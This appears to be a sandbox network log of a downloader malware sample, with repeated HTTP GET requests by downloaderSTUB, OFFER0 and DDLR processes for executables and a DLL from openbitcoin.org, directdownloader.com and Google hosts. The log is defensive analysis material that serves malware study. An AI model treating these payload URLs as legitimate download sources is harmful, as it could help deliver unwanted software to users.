    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 51
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:31 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:28 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 53
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:31 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:31 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 54
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:32 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    216.239.32.21:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: http://www.openbitcoin.org/static/dist/OpenCL.dll
    Date: Mon, 25 Dec 2023 11:00:32 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 246
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • flag-us
    GET
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://www.directdownloader.com/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /toolbars/optimizer.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 106
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 284
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 59
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 277
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 59
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 266
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 59
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:34 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 259
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 61
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:33 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:39 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 59
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:34 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:34 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 57
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:34 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 57
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 58
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
